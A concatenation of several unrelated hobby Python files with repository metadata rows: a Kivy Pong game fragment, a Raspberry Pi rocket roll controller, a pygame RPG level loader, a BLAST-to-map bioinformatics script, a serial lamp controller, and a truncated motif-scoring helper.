self.who_wins = "Player 1 wins"
elif self.is_menu == "No menu":
self.is_menu = "menu"
self.the_menu()
def on_touch_move(self, touch):
if touch.x < self.width / 3:
self.player1.center_y = touch.y
if touch.x > self.width - self.width / 3:
self.player2.center_y = touch.y
class PongApp(App):
def build(self):
game = PongGame()
game.serve_ball()
Clock.schedule_interval(game.update, 1.0/60.0)
return game
if __name__ == "__main__":
PongApp().run()
| DonyTawil/MyKivy | Pong/main.py | main.py | py | 3,653 | python | en | code | 0 | github-code | 13 |
17292129823 | import time
import csv
import numpy
import Adafruit_BMP.BMP085 as BMP180
import Adafruit_ADS1x15.ADS1115 as adc
import smbus
power_mgmt_1 = 0x6b
power_mgmt_2 = 0x6c
bus = smbus.SMBus(0)
address = 0x1e
def read_byte(adr):
return bus.read_byte_data(address, adr)
def read_word(adr):
high = bus.read_byte_data(address, adr)
low = bus.read_byte_data(address, adr+1)
val = (high << 8) + low
return val
def read_word_2c(adr):
val = read_word(adr)
if (val >= 0x8000):
return -((65535 - val) + 1)
else:
return val
def set(property, value):
try:
f = open("/sys/class/rpi-pwm/pwm0/" + property, 'w')
f.write(value)
f.close()
except:
print("Error writing to: " + property + " value: " + value)
def current_milli_time():
return lambda: int(round(time.time() * 1000))
def setServo(angle):
set("servo", str(angle))
def arduino_map(x, in_min, in_max, out_min, out_max):
return (x - in_min) * (out_max - out_min) // (in_max - in_min) + out_min
def write_to_csv(var):
time_current = time.strftime("%H_%M_%S")
date = time.strftime("%Y_%m_%d")
filename = time_current + "EST" + date + "_data" + ".csv"
with open(filename, "wb") as fb:
c = csv.writer(fb)
c.writerow(var)
def main():
set("delayed", "0")
set("mode", "servo")
set("servo_max", "180")
set("active", "1")
delay_period = 0.01
t = 0
scale = 200
########given#######
# state launch conditions
R = 287 # J/(kg*K)
# h_o = 0 # m
# P_o = 101300 # Pa
# L = -0.0065 # K/m
# T_o = 273 # K
# g = 9.81 # m/s^2
# state the gain of controller
kp = 2
ki = 0
kd = 1
# initialize fin position
phi = 0 # degrees
setServo(phi)
# state desired roll
r = 10 # degrees/s
while True: # infinite loop
# calculate time
t_old = t
t = current_milli_time()
del_t = t - t_old
# calcualte om_x, om_y, om_z angular velocities
# read straight from MPU-6050 gyroscope (scaled)
om_x = read_word_2c(0x43) / 131
om_y = read_word_2c(0x45) / 131
om_z = read_word_2c(0x47) / 131
# calculate roll, pitch, yaw angular positions
roll = om_x * del_t
pitch = om_y * del_t
yaw = om_z * del_t
# calcualte al_x, al_y, al_z angular accelerations
al_x = om_x / del_t
al_y = om_y / del_t
al_z = om_z / del_t
# calcualte a_x, a_y, a_z accelerations
# read straight from ADXL377 high-g accelerometer
a_x = arduino_map(adc.read_adc(0), 0, 675, -scale, scale)
a_y = arduino_map(adc.read_adc(1), 0, 675, -scale, scale)
a_z = arduino_map(adc.read_adc(2), 0, 675, -scale, scale)
# calculate x, y, z position
x = a_x / (del_t) ^ 2
y = a_y / (del_t) ^ 2
z = a_z / (del_t) ^ 2
# calculate u, v, w velocities
u = a_x / del_t
v = a_y / del_t
w = a_z / del_t
# calculate P, T, h, rho
# read from BMP180 sensor
P = BMP180.read_pressure()
P_o = BMP180.read_sealevel_pressure()
T = BMP180.read_temperature()
rho = P / (R * T)
h = BMP180.read_altitude()
# h = (T/L)*((P_o/P)^(R*L/g)-1)+h_o
# calculate error
e = r - roll
e_int = e * t
e_der = e / del_t
# apply the controlled gain to the servo based on the error
phi = kp * e + ki * e_int + kd * e_der
setServo(phi)
time.sleep(delay_period)
var = [t, del_t, roll, pitch, yaw, om_x, om_y, om_z, al_x, al_y, al_z, x, y, z,
u, v, w, a_x, a_y, a_z, phi, e, P, T, rho, h]
write_to_csv(var)
# write out to .csv file
# delay to protect code from breaking.
time.sleep(0.010) # seconds
if __name__ == '__main__':
main()
| gcostigan/stab | STAB_1_code/RaspberryPiZero/stab_I.py | stab_I.py | py | 3,916 | python | en | code | 5 | github-code | 13 |
20421011399 | # -*- coding: utf-8 -*-
"""
Created on Thu May 11 20:21:41 2023
@author: alexa
"""
import pygame
from settings import *
from tile import Tile
from player import Player
from debug import *
from support import *
from random import choice
class Level:
def __init__(self):
# get the display surface
self.display_surface = pygame.display.get_surface()
# sprite group setup
self.visible_sprites = YSortCameraGroup()
self.obstacle_sprites = pygame.sprite.Group()
self.create_map()
def create_map(self):
layouts = {
'boundary': import_csv_layout('C:/Users/alexa/OneDrive/Desktop/Python-RPG-Game/map/map_FloorBlocks.csv'),
'grass': import_csv_layout('C:/Users/alexa/OneDrive/Desktop/Python-RPG-Game/map/map_Grass.csv'),
'object': import_csv_layout('C:/Users/alexa/OneDrive/Desktop/Python-RPG-Game/map/map_LargeObjects.csv'),
}
graphics = {
'grass': import_folder('C:/Users/alexa/OneDrive/Desktop/Python-RPG-Game/graphics/grass'),
'objects': import_folder('C:/Users/alexa/OneDrive/Desktop/Python-RPG-Game/graphics/objects')
}
# iterate through each item in layouts dictionary
# find x and y positions
for style, layout in layouts.items():
for row_index, row in enumerate(layout):
for column_index, column in enumerate(row):
if column != '-1':
x = column_index * TILESIZE
y = row_index * TILESIZE
if style == 'boundary':
Tile((x,y),[self.obstacle_sprites], 'invisible',)
if style == 'grass':
# select from random grass sprite
random_grass_img = choice(graphics['grass'])
Tile((x,y),[self.visible_sprites,self.obstacle_sprites], 'grass', random_grass_img)
if style == 'object':
surf = graphics['objects'][int(column)]
Tile((x,y),[self.visible_sprites,self.obstacle_sprites], 'object', surf)
# if column == 'x':
# Tile((x,y), [self.visible_sprites,self.obstacle_sprites])
# if column == 'p':
# self.player = Player((x,y), [self.visible_sprites], self.obstacle_sprites)
self.player = Player((2000,1430), [self.visible_sprites], self.obstacle_sprites)
def run(self):
self.visible_sprites.custom_draw(self.player)
self.visible_sprites.update()
# update and draw the game
pass
class YSortCameraGroup(pygame.sprite.Group):
def __init__(self):
super().__init__()
self.display_surface = pygame.display.get_surface()
# getting the coordinates for the middle of the screen
self.half_width = self.display_surface.get_size()[0] // 2
self.half_height = self.display_surface.get_size()[1] // 2
# at the beginning, set camera to 100,200
self.camera = pygame.math.Vector2(100,200)
# self.camera = pygame.math.Vector2(0,0)
self.floor_surface = pygame.image.load('C:/Users/alexa/OneDrive/Desktop/Python-RPG-Game/graphics/tilemap/ground.png').convert()
self.floor_rect = self.floor_surface.get_rect(topleft = (0,0))
def custom_draw(self, player):
# adjust camera to center the player
self.camera.x = player.rect.centerx - self.half_width
self.camera.y = player.rect.centery - self.half_height
# placing floor before everything else
floor_offset_pos = self.floor_rect.topleft - self.camera
self.display_surface.blit(self.floor_surface, floor_offset_pos)
# display all sprites including player
for sprite in sorted(self.sprites(), key = lambda sprite: sprite.rect.centery): # key is y position of each sprite
camera_pos = sprite.rect.topleft - self.camera
self.display_surface.blit(sprite.image, camera_pos)
| alehic173/Python-RPG-Game | level.py | level.py | py | 4,509 | python | en | code | 0 | github-code | 13 |
38188821944 | from Bio import SeqIO
from Bio.Blast import NCBIWWW
from Bio.Blast import NCBIXML
from progress.bar import Bar
import pandas as pd
import geopandas
import matplotlib.pyplot as plt
import os
import re
import geopy.geocoders
from geopy.geocoders import Nominatim
from Bio import Entrez
import folium
def runBlast(sequence_file: str) -> list:
'''
Function to run BlastN using the given sequence file as input and return a
list of the accession numbers for 50 top hits
Parameters:
sequence_file: str -- name of DNA sequence file in FASTA format
Returns:
accession numbers for 50 top hits, as list
'''
# if the xml file which contains the blast outputs does not exist, use qblast to invoke the NCBI BLAST server over the internet and save the outputs on the local machine as an xml file:
if not (os.path.exists("results.xml")):
sequence_data = open(sequence_file).read()
bar = Bar("Processing sequence data... ")
result_handle = NCBIWWW.qblast("blastn", "nt", sequence_data) #blastn = program, "nt" = database to search against, in this case, "nt" stands for the nucleotide databse
bar.finish()
with open("results.xml","w") as save_file: # write the blastn output to a xml file
blast_results = result_handle.read()
save_file.write(blast_results)
results = open("results.xml","r")
records = list(NCBIXML.parse(results)) # parse results (xml file) into a list
one_query = records[0] #from a list to a record class that holds all BLAST output
accession_numbers = [] #create empty list to store the accession_numbers of each organism
for i in range(len(one_query.alignments)): #loop through every query to obtain the accession_number
one_hit = one_query.alignments[i]
accession_numbers.append(one_hit.accession)
return accession_numbers
def getLocationsAuthors(accession_numbers: list) -> list:
'''
Function to use Entrez to parse location and first author data for the each
of 50 top hits from BlastN output and return that data in a list
Parameters:
accession_numbers: list -- accession numbers for 50 top hits
Results:
location of institution and first author associated with 50 top hits
from BlastN output
'''
Entrez.email = input("Enter your email address (so that NCBI can contact you if there's a problem): ")
bar = Bar("Processing accession numbers in GenBank:", max = len(accession_numbers))
# create two empty lists that store the location and author informations
location_list = []
author_list = []
# parse GenBank data for every matching sequence (accession number)
for i in accession_numbers:
handle = Entrez.efetch(db = 'nucleotide', rettype = 'gb', retmode = 'text', id = i)
record = handle.read()
info = record.split("\n") # split the text file by new line
location_line = [i for i in info if i.startswith(' JOURNAL Submitted') or i.startswith('FEATURES') or i.startswith('COMMENT')] # extract lines that starts with ' JOURNAL Submitted' which contains the location information, and lines that starts with 'FEATURES' or 'COMMENT' which are the lines right after the location information
location_line_indices = []
for j in location_line:
index_number = info.index(j) #extract the index of the locations line
location_line_indices.append(index_number)
index_1 = location_line_indices[0] # first location line
index_2 = location_line_indices[-1] # last location line
location_info = info[index_1:index_2]
first_line = location_info[0]
first_line_split = first_line.split(") ") # all location lines begin with 'JOURNAL Submitted (date)', so split the line accordingly and only store the relevant information
cleaned_first_line = first_line_split[1]
location = cleaned_first_line
for h in location_info[1:]: # for the rest of the location lines
cleaned_line = h.lstrip(" ") # delete the extra spaces in front of the first letter
location += cleaned_line # append the info to the first line
# filter out all possible irrelevant information:
if "COMMENT" in location:
updated_location = location.split("COMMENT")
location = updated_location[0]
if "URL" in location:
updated_location = location.split("URL")
location = updated_location[0]
location_list.append(location)
author_line = [a for a in info if a.startswith('REFERENCE 2') or a.startswith(' TITLE Direct Submission')]
author_line_indices = []
for q in author_line:
index_number_ = info.index(q)
author_line_indices.append(index_number_)
index_reference = author_line_indices[0]
index_author = index_reference + 1 # author information starts on the next line
index_title = author_line_indices[-1] # title line is the line right after the author info
author_info = info[index_author:index_title]
try:
first_author_line = author_info[0]
first_author_split = first_author_line.split("THORS ")
cleaned_first_author_line = first_author_split[1]
author = cleaned_first_author_line
for k in author_info[1:]:
cleaned_line = k.lstrip(" ")
author += cleaned_line
author_list.append(author)
except IndexError as error: # the line reference 2 may not exist if there is only one reference
author_line_indices = []
author_line = [g for g in info if g.startswith(' AUTHORS') or g.startswith(' TITLE Direct Submission')] # search for line that starts with 'AUTHORS' instead of 'Reference 2'
for l in author_line:
index_number_ = info.index(l)
author_line_indices.append(index_number_)
index_author = author_line_indices[0]
index_title = author_line_indices[-1]
author_info = info[index_author:index_title]
first_author_line = author_info[0]
first_author_split = first_author_line.split("THORS ")
cleaned_first_author_line = first_author_split[1]
author = cleaned_first_author_line
for k in author_info[1:]:
cleaned_line = k.lstrip(" ")
author += cleaned_line
author_list.append(author)
bar.next()
location_author_list = [location_list, author_list]
bar.finish()
return location_author_list
def getAddress(locations: list) -> list:
'''
Function to use regex to pull the valid address from each of the more specific
locations parsed by GenBank
Args:
locations: list of all locations parsed from GenBank
Returns:
list of valid addresses
* Note: this regex will not work for all locations returned from GenBank,
but invalid addresses will be caught by getLatLongLists
'''
address_list = []
regex_ = "([\sa-zA-Z0-9-]+,[\sa-zA-Z]+[\s0-9a-zA-Z-]+,[a-zA-Z\s]+)$" # regular expression to get the specific address that exludes the institution names and in some cases the street name as well
for i in locations:
result = re.findall(regex_, i)
final_result = " ".join(result)
cleaned_result = final_result.strip()
split_address = cleaned_result.split(",")
first, second = split_address[0], split_address[2] # only need the street/city and the country. The zip code info which belongs to split_address[1] is eliminated as Nominatim is unable to process zip code.
address = first, second
valid_address = ', '.join(address)
address_list.append(valid_address)
return address_list
def getLatLong(address: str) -> list:
'''
Function to use Nominatim from the geopy library to return the latitude and
longitude of a given address, as list
Args:
address: str -- specific address to find latitude and longitude for
Returns:
tuple containing latitude and longitude of address
'''
geolocator = Nominatim(user_agent="dcs211_randers2/1")
location = geolocator.geocode(address)
lat = location.latitude
long = location.longitude
return [lat,long]
def getLatLongLists(address_list: list) -> list:
'''
Function to get the latitude and longitude for each address and return them
as a list containing the latitude list and the longitude list
Args:
address_list: list -- list of all addresses to be processed
Returns:
list containing a list of latitudes for every address and a list of
longitudes for every address
'''
lat_list = []
long_list = []
bar = Bar("Processing each address in Nominatim:", max = len(address_list))
for i in address_list:
try:
lat_long = getLatLong(i)
except AttributeError as error:
print(" ")
print(f"Unable to fetch the following address using Nominatim: {i}")
new_address = input("Enter valid address in 'city, country' format: ") # in case a foreign street name was the problem that Nominatim cannot process the address info
try:
lat_long = getLatLong(new_address)
except AttributeError as error:
print(" ")
print("Invalid Address entered")
lat_long = ["Invalid Address", "Invalid Address"]
lat_list.append(lat_long[0])
long_list.append(lat_long[1])
bar.next()
bar.finish()
return [lat_list, long_list]
def makeDataDict(accession_numbers: list, lat_long_list: list, location_author_list: list):
'''
Function to make a dictionary with five keys: acccession numbers, authors, address, latitude, longitude
Args:
accession numbers: list -- list of all accession numbers
lat_long_list: list -- list containing a list of latitudes for every address and a list of longitudes for every address
location_author_list: list -- location of institution and author names
Returns:
dictionary containing five keys: acccession numbers, authors, address, latitude, longitude
'''
blast_dict = {'locus_name/accession_numbers': accession_numbers, 'authors': location_author_list[1], 'address': location_author_list[0], 'Latitude': lat_long_list[0], 'Longitude': lat_long_list[1]}
return blast_dict
def makeInteractive(blast_data_dict: dict):
'''
Function to make an interactive map based on the location of the institution with pop up that shows the accession number, address, and authors for each location
Args:
blast_data_dict: dict -- a dictionary containing acccession numbers, authors, address, latitude, longitude as keys
Returns:
an interactive leaflet map made using the library Folium
'''
df = pd.DataFrame(blast_data_dict)
grouped_df = df.groupby(['authors','address','Latitude','Longitude'])['locus_name/accession_numbers'].apply(', '.join).reset_index() # use group by since some of the genes (accession numbers) are discovered by the same authors
map = folium.Map([51.1657, 10.4515], tiles="Stamen Terrain", zoom_start = 2)
for index, location_info in grouped_df.iterrows():
folium.Marker([location_info["Latitude"], location_info["Longitude"]], popup= "Locus name/accession number: " + location_info["locus_name/accession_numbers"] + '<br>' + '<br>' + "Authors: " + location_info["authors"] + '<br>' + '<br>' + "Address: " + location_info["address"]).add_to(map)
map.save("interactive_map.html")
def main():
accession_numbers = runBlast("blast.fasta")
location_author_list = getLocationsAuthors(accession_numbers)
address_list = getAddress(location_author_list[0])
latlong_list = getLatLongLists(address_list)
blast_data_dict = makeDataDict(accession_numbers, latlong_list, location_author_list)
makeInteractive(blast_data_dict)
if __name__ == "__main__":
main()
| rebeccalilly/dcs211final | dcsfinal.py | dcsfinal.py | py | 12,175 | python | en | code | 0 | github-code | 13 |
21051835313 | from comdev import *
import json
import sys
# Device with serial interface (fitolamp)
class Fitolamp(Comdevice):
def __init__(self, port_name):
self.status = {"result_code": -1,
"result_text": "NoData",
"current_dtime": "NoData",
"power_state": -1,
"ch1_power": -1,
"ch2_power": -1,
"ch3_power": -1,
"start_time": "NoData",
"stop_time": "NoData",
"smooth_control": False
}
try:
Comdevice.__init__(self, port_name,
baud=115200,
parity=PARITY_NONE,
stopbits=STOPBITS_ONE,
bytesize=EIGHTBITS,
timeout=1)
except OpenPortException:
raise
def print_status(self):
for item in self.status:
print(item + ":\t" + str(self.status[item]))
# private function
def __send_request(self, request):
self.write(request.encode('utf-8'))
responce = self.read_until(CR+LF, 512)
result = responce.decode("utf-8")
try:
parsed = json.loads(result)
except json.JSONDecodeError:
print("JSONDecodeError")
print(sys.exc_info()[:2])
return False
else:
# update settings values
for item in self.status:
self.status[item] = parsed[item]
if parsed["result_code"] == 0 and parsed["result_text"] == "OK" :
return True
else:
return False
def get_status(self):
request = '{}\r\n'
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_start_time(self, value):
request = json.dumps({"start_time":str(value)}) + "\r\n"
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_stop_time(self, value):
request = json.dumps({"stop_time":str(value)}) + "\r\n"
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_current_time(self, value):
request = json.dumps({"current_time":str(value)}) + "\r\n"
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_red_power(self, value):
request = json.dumps({"ch2_power":str(value)}) + "\r\n"
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_blue_power(self, value):
request = json.dumps({"ch3_power":str(value)}) + "\r\n"
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_white_power(self, value):
request = json.dumps({"ch1_power":str(value)}) + "\r\n"
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_smooth_control(self, value):
request = json.dumps({"smooth_control":str(value)}) + "\r\n"
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_all(self): pass
def close(self):
Comdevice.close(self)
# Self-Test
if __name__ == "__main__":
for port in get_avail_ports():
print(port)
fitolamp = Fitolamp("COM8")
fitolamp.get_status()
print("Set current time:\t" + fitolamp.set_current_time("17:00"))
print("Set start time:\t" + fitolamp.set_start_time("18:00"))
fitolamp.print_status()
fitolamp.close()
print("Test finished, Port closed")
| MikhailBerezhanov/FLC-01 | gui/flc_com.py | flc_com.py | py | 3,727 | python | en | code | 0 | github-code | 13 |
22006876685 | import keyboardModule as kb
from djitellopy import tello
from time import sleep
import cv2, time
import rospy
import sys,os
from std_msgs.msg import String,Float32MultiArray, Int32MultiArray,Bool
from sensor_msgs.msg import Image
from cv_bridge import CvBridge
"""
if kb.getKey("q"):
mytello.land()
elif kb.getKey("z"):
mytello.takeoff()
"""
#mytello = tello.Tello()
#mytello.connect()
#print('123',mytello)
#print(type(mytello))
#print("目前電池電量: {}%".format(mytello.get_battery()))
#camera = False
#mytello.streamoff()
#kb.init()
pub_img = rospy.Publisher('frame_img', Int32MultiArray,queue_size=10)
def callback(data):
val =data.data
print(data.data)
if val[4]==1:
mytello.takeoff()
if val[5]==1:
mytello.land()
#rospy.loginfo(rospy.get_caller_id() + ' I heard %s', data.data)
lr, fb, ud, yv = int(val[0]), int(val[1]), int(val[2]), int(val[3])
mytello.send_rc_control(lr, fb, ud, yv)
def camera(data):
val = data.data
print(data.data)
if val[0]:
if not mytello.stream_on:
#mytello.streamoff()
mytello.streamon()
img = mytello.get_frame_read().frame
img = cv2.resize(img, (360, 240))
cv2.imshow("Mytello", img)
cv2.waitKey(1)
a = Int32MultiArray(data = img.reshape(-1).tolist())
pub_img.publish(a)
sleep(0.05)
else:
mytello.streamoff()
cv2.destroyAllWindows()
if not val[0]:
if mytello.stream_on:
img = mytello.get_frame_read().frame
img = cv2.resize(img, (360, 240))
cv2.imshow("Mytello", img)
cv2.waitKey(1)
a = Int32MultiArray(data = img.reshape(-1).tolist())
pub_img.publish(a)
sleep(0.05)
if val[1] and mytello.stream_on:
cv2.imwrite(r"saveImg/{}.jpg".format(time.time()), img)
sleep(0.5)
def over(data):
ov = data.data
print(data.data)
if ov:
print("omg")
if mytello.stream_on:
mytello.streamoff()
if mytello.is_flying:
mytello.land()
#os._exit(0)
def listener():
# In ROS, nodes are uniquely named. If two nodes with the same
# name are launched, the previous one is kicked off. The
# anonymous=True flag means that rospy will choose a unique
# name for our 'listener' node so that multiple listeners can
# run simultaneously.
rospy.init_node('listener', anonymous=True)
#rate = rospy.Rate(10)
#timer = rospy.Timer(rospy.Duration(1),frame_callback)
#rospy.spin()
#timer.shutdown()
#while not rospy.is_shutdown():
rospy.Subscriber('over',Bool,over)
rospy.Subscriber('move', Float32MultiArray, callback)
rospy.Subscriber('camera',Int32MultiArray,camera)
img = mytello.get_frame_read().frame
img = cv2.resize(img,(360,240))
rospy.spin()
#rate.sleep()
if __name__ == '__main__':
mytello = tello.Tello()
mytello.connect()
print("目前電池電量: {}%".format(mytello.get_battery()))
listener()
| oscar50513/AI_project | drown_ws/control_node.py | control_node.py | py | 3,123 | python | en | code | 0 | github-code | 13 |
41670160570 | __version__ = 10
import urllib.request
import os
import sys
import zipfile
import time
from optparse import OptionParser
import platform
import shutil
import json
import subprocess
import http.client, mimetypes
import tempfile
print("\nSimple Jobs Distribution Framework\nversion: {}, platform: {}".format(__version__, platform.system()))
# host must include the protocol (http://, https:// ...)
SERVER = ""
system = platform.system()
zipfiles_mem = []
jobs_count = 0
def wait():
print("\nThe Simple Distributed Computing Platform client will exit in 15 seconds...\n")
time.sleep(15)
class unzip:
def __init__(self, verbose = False, percent = 10):
self.verbose = verbose
self.percent = percent
def extract(self, file, dir):
if not dir.endswith(':') and not os.path.exists(dir):
os.mkdir(dir)
zf = zipfile.ZipFile(file)
# create directory structure to house files
self._createstructure(file, dir)
num_files = len(zf.namelist())
percent = self.percent
divisions = 100 / percent
perc = int(num_files / divisions)
# extract files to directory structure
for i, name in enumerate(zf.namelist()):
if self.verbose == True:
print( "Extracting %s" % name)
elif perc > 0 and (i % perc) == 0 and i > 0:
complete = int (i / perc) * percent
print( "%s%% complete" % complete)
if not name.endswith('/'):
outfile = open(os.path.join(dir, name), 'wb')
print( 'File:',os.path.join(dir, name))
outfile.write(zf.read(name))
outfile.flush()
outfile.close()
# set permission to u+rwx (448)
os.chmod(os.path.join(dir, name) , 448)
return True
def _createstructure(self, file, dir):
self._makedirs(self._listdirs(file), dir)
def _makedirs(self, directories, basedir):
""" Create any directories that don't currently exist """
for dir in directories:
curdir = os.path.join(basedir, dir)
if not os.path.exists(curdir):
os.mkdir(curdir)
def _listdirs(self, file):
""" Grabs all the directories in the zip structure
This is necessary to create the structure before trying
to extract the file to it. """
zf = zipfile.ZipFile(file)
dirs = []
for name in zf.namelist():
if name.endswith('/'):
dirs.append(name)
dirs.sort()
return dirs
def post_multipart(host, selector, fields, files):
"""
Post fields and files to an http host as multipart/form-data.
"""
content_type, body = encode_multipart_formdata(fields, files)
# Choose between http and https connections
if(host.find('https') == 0):
h = http.client.HTTPSConnection(host)
else:
h = http.client.HTTPConnection(host)
h.putrequest('POST', selector)
h.putheader('content-type', content_type)
h.putheader('content-length', str(len(body)))
h.endheaders()
h.send(body)
response = h.getresponse()
return response.read()
def encode_multipart_formdata(fields, files):
"""
fields is a sequence of (name, value) elements for regular form fields.
files is a sequence of (name, filename, value) elements for
"""
BOUNDARY_STR = '----------ThIs_Is_tHe_bouNdaRY_$'
CRLF = bytes("\r\n","ASCII")
L = []
for (key, value) in fields:
L.append(bytes("--" + BOUNDARY_STR,"ASCII"))
L.append(bytes('Content-Disposition: form-data; name="%s"' % key,"ASCII"))
L.append(b'')
L.append(bytes(value,"ASCII"))
if files:
for (key, filename, value) in files:
L.append(bytes('--' + BOUNDARY_STR,"ASCII"))
L.append(bytes('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename),"ASCII"))
L.append(bytes('Content-Type: %s' % get_content_type(filename),"ASCII"))
L.append(b'')
L.append(value)
L.append(bytes('--' + BOUNDARY_STR + '--',"ASCII"))
L.append(b'')
body = CRLF.join(L)
content_type = 'multipart/form-data; boundary=' + BOUNDARY_STR
return content_type, body
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def get_project_parameters():
usage = "usage: ./%prog [options]"
parser = OptionParser(usage=usage)
parser.add_option("-s", "--server", dest = "server", help = "Server address:port")
parser.add_option("-p", "--project", dest = "project", help = "Project name (all: choose between all projects, random: randomly choose a project)")
parser.add_option("-l", "--list", action = "store_true", dest = "list", help = "List of projects")
parser.add_option("-n", "--jobs-number", dest = "nj", help = "Number of jobs to compute")
parser.add_option("-u", "--unique", action = "store_true", dest = "unique", help = "Launch if not already running")
parser.add_option("-v", "--version", action = "store_true", dest = "ver", help = "Print client version")
parser.add_option("-a", "--after", dest = "t1", help = "No job computation after (i.e 600 for 6:00 AM)")
parser.add_option("-b", "--before", dest = "t2", help = "No job computation before (i.e 2000 for 8:00 PM)")
(options,args) = parser.parse_args()
if options.ver:
sys.exit(0)
if options.unique:
unique = True
else:
unique = False
print('unique',unique)
server = options.server if options.server else SERVER
print("\nQuerying available projects for your platform...")
try:
response = urllib.request.urlopen("{server}/projectsList?clientVersion={clientVersion}&system={system}".format(server=server, clientVersion=__version__, system=platform.system()))
response = response.read().decode('utf-8').strip()
except:
return True, "Error! Check the server URL"
remoteProjectsList = json.loads(response)
print("Available projects for your OS: {}".format(",".join(remoteProjectsList)))
if options.list:
return True, ""
projectName = options.project
if projectName:
print("project name:", projectName)
if projectName in remoteProjectsList:
if options.nj is not None:
nj = int(options.nj)
else:
if options.t1 and options.t2:
nj = 1e6
else:
while True:
try:
nj = int(input("\nNumber of jobs: "))
break
except ValueError:
print("Not a valid number. Try again...")
return False, (projectName, nj, server, unique)
else:
return True, 'project not found'
else:
return True, 'No project'
def execute(projectName, server):
"""
download job to execute
return return_code, msg
return_code True if error
"""
jobDir = ""
job_id = -1
print("Getting job from server...")
try:
response = urllib.request.urlopen("{server}/get_job?project={projectName}&system={system}".format(server=server, projectName=projectName, system=platform.system()))
#print(response.read())
#print ("Response:", response)
# Get the URL. This gets the real URL.
#print( "The URL is: ", response.geturl())
# Getting the code
#print( "This gets the code: ", response.code)
if response.code != 200:
return True, "Download error {}".format(response.code)
#print( "The Headers are: ", response.info())
# Get all data
job = json.loads(response.read().decode('utf-8').strip())
if "msg" in job:
print(job["msg"])
raise Exception(True, job["msg"])
job_id = job["job_id"]
print("Job id: {}".format(job_id))
command = json.loads(job["command"])
results_file = job["results_file"].replace("###JOB_ID###", str(job_id) )
data = job["data"].replace("###JOB_ID###", str(job_id))
program = json.loads(job["program"])
if platform.system() in command:
system_command = command[platform.system()].replace("###JOB_ID###", str(job_id))
else:
raise Exception(True, "No jobs for your OS ({})".format(platform.system()))
# check if project dir exists
jobDir = "{}_{}".format(projectName, job_id)
if not os.path.isdir(jobDir):
os.makedirs( jobDir )
os.chdir(jobDir)
if program:
if platform.system() in program:
system_program = program[ platform.system() ]
if system_program:
for file_ in system_program:
response = urllib.request.urlopen("{server}/data/{file}".format(server=server, file=file_))
program_file_content = response.read()
with open( file_, "wb") as fh:
fh.write( program_file_content )
# check if fileis compressed
if ".zip" in file_:
unzipper = unzip()
unzipper.extract(file_, ".")
# project dir exists cd
else:
raise Exception(True, "directory {} already exists".format(jobDir))
if data:
try:
response = urllib.request.urlopen("{server}/data/{data}".format(server=server, data=data))
data_file_content = response.read()
except:
raise Exception(True, "File not found: {}".format(data))
if b"###JOB_ID###" in data_file_content:
data_file_content = data_file_content.replace(b"###JOB_ID###", str(job_id) )
with open( data, "wb") as outFile:
outFile.write( data_file_content)
# check if data is compressed file
if ".zip" in data:
unzipper = unzip()
unzipper.extract(data, ".")
p = subprocess.Popen(system_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True )
out, error = p.communicate()
#print(out)
#print(error)
#out = out.decode('utf-8')
#error = error.decode('utf-8')
if error:
# update DB with error in job_status field
raise Exception(True, error.decode('utf-8'))
#return True, "Error: {}".format(retcode)
if results_file and os.path.isfile(results_file):
try:
fields = [('job_id', str(job_id)), ('project', projectName), ("job_status", "d")]
files = [('upload_file', results_file, open(results_file, "rb").read())]
post_multipart(server.replace('http://', ''), '/upload', fields, files)
except:
raise Exception(True, "Error uploading file")
else:
if not os.path.isfile(results_file):
raise Exception(True, "Results file not found")
# remove job directory
os.chdir(sys.path[0])
shutil.rmtree(jobDir)
return False, "Job completed"
except Exception as error:
# send error to server if job
print(error.args[1])
print('job_id', job_id)
if job_id != -1:
fields = [('job_id', str(job_id)), ('project', projectName), ('job_status', 'error: {}'.format(error.args[1]))]
post_multipart(server.replace('http://', ''), '/upload', fields, None)
# delete job directory (if any)
os.chdir(sys.path[0])
if os.path.isdir(jobDir):
print("deleting job directory")
shutil.rmtree(jobDir)
print("Job directory deleted")
print("final except")
return error.args
# read parameters
result, parameters = get_project_parameters()
if result:
print(parameters)
sys.exit()
projectName, jobsMaxNumber, server, unique = parameters
if unique and os.path.isfile(tempfile.gettempdir() + os.sep + "distrib_client_lock"):
print("distrib client is already running. If not delete the {} file".format(tempfile.gettempdir() + os.sep + "distrib_client_lock"))
sys.exit()
# write lock file
try:
with open(tempfile.gettempdir() + os.sep + "distrib_client_lock", "w") as f_out:
f_out.write(str(os.getpid()))
except:
print("Writing lock file failed")
jobNumber = 0
while True:
try:
result, msg = execute(projectName, server)
except:
result = True
msg = "Undefined error"
# return to script directory
os.chdir(os.path.dirname(os.path.realpath(__file__)))
if result:
print(msg)
break
else:
jobNumber += 1
if jobNumber >= jobsMaxNumber:
break
print( "{} job(s) executed".format(jobNumber))
try:
os.unlink(tempfile.gettempdir() + os.sep + "distrib_client_lock")
except:
print("Deleting lock file failed")
| olivierfriard/jobs-distribution | client.py | client.py | py | 13,291 | python | en | code | 1 | github-code | 13 |
22996498097 | # -*- coding: utf-8 -*-
"""
Created on Wed Apr 17 16:37:39 2019
"""
import numpy as np
def cal_ICPC(pos):
if pos >= 0.0001:
y = pos*np.log2(pos/0.25)
else:
y = 0
return y
def find_possible(ICPC):
possible_range = []
for ii in range(0,10001):
i = ii/10000
if ii == 10000:
i = 1
if ii == 0:
i = 0
max_ICPC = cal_ICPC(i)+cal_ICPC(1-i)
min_ICPC = cal_ICPC(i)+cal_ICPC((1-i)/3)*3
if max_ICPC >= ICPC - 0.00001 and min_ICPC <= ICPC + 0.00001:
possible_range.append(i)
first = np.random.choice(possible_range)
possible_range_2nd = []
for iii in range(0, 10001 - int(np.round(first*10000))):
i1 = iii/10000;
max_ICPC2 = cal_ICPC(i1) + cal_ICPC(1-first-i1) + cal_ICPC(first)
min_ICPC2 = cal_ICPC(i1)+cal_ICPC((1-first-i1)/2)*2 + cal_ICPC(first)
